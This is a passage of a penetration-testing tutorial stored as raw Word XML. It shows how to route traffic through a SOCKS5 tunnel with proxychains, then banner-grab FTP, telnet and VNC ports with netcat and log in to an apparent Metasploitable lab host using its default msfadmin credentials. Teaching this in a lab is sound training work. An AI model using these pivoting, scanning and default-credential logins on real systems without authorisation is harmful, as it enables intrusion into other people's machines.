        <w:t>If proxychains4 is not configured for the socks5 proxy, we can make an entry in its configuration file using any text editor. The configuration file is located in the /etc as proxychains</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4.conf.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58E97EA1" w14:textId="52D2CED0"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="482DA0E2" wp14:editId="2B400A2B">
            <wp:extent cx="3192780" cy="64770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92780" cy="647700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ABC8F3" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>To edit the configuration file, we need to comment socks4 proxy if that is configured by default and add socks5 on the loopback interface with the port number. We can use any port, but in this example, we use port 1080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2948B951" w14:textId="67666672"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1981E1FC" wp14:editId="447F6C31">
            <wp:extent cx="3832860" cy="14782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32860" cy="1478280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA2440" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner grabbing of the remote host with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="484DA48F" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s grab the banner of ports 21, 23, and 5900. Port 21 belongs to the File transfer protocol, 23 to the telnet, and 5900 to the VNC server. FTP transfers files from different sources to different destinations, and the telnet is used for the remote connection in the command line interface. On the other hand, VNC can be used to establish a GUI-based remote connection. To grab the banners or access the remote host, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> before using any command so the request will be made from the tunnel that we created. From the output, it is confirmed that all three ports are open. In our command, we have used -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>zvn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> options that stand for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AEDEB5" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>-n Do not do DNS or service lookups on specified addresses, hostnames, or ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A2C104" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-v Have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> give more verbose output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED36235" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-z Specifies that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> should only scan for listening daemons without sending any data to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B8E75" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>zvn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>146</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F44DF9E" w14:textId="07590946"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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26C738E5" wp14:editId="612FF1B8">
            <wp:extent cx="5731510" cy="169926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1699260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20438452" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet Connection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5938020C" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet is a remoting protocol that does not encrypt the data while transmitting. It transmits data in a plain text format. Let’s establish a telnet connection with valid credentials </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. As expected, we successfully established a remote connection with the remote host using telnet protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B37268" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> telnet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>146</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0338D6C7" w14:textId="67F4D4C6"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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43DE7372" wp14:editId="6BC10BF6">
            <wp:extent cx="5731510" cy="560705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5607050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36943F59" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP connection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="704F15DE" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>FTP (File Transfer Protocol) is a network protocol for transmitting files between computers over Transmission Control Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP is considered an application layer protocol. Let’s connect with the same credentials we used in telnet. We connected to ftp successfully, and with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> command, we can list the available file in the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2506E301" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>146</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F72DC" w14:textId="6C9A45F6"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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47FFB67A" wp14:editId="26ECFC5D">
            <wp:extent cx="5731510" cy="2645410"/>
            <wp:effectExtent l="0" t="0" r="254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2645410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61261F10" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">VNC Viewer connection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E828B0C" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">In the last example, we will connect with the VNC viewer. VNC Viewer is used for local computers and mobile devices you want to control from. A device such as a computer, tablet, or smartphone with installed VNC Viewer software can access and control a computer in another location. This service runs in its default port, 5900. To establish a connection with VNC, we can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vncviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility and the remote IP address, and we will receive a GUI-based interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D03DB" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>vncviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
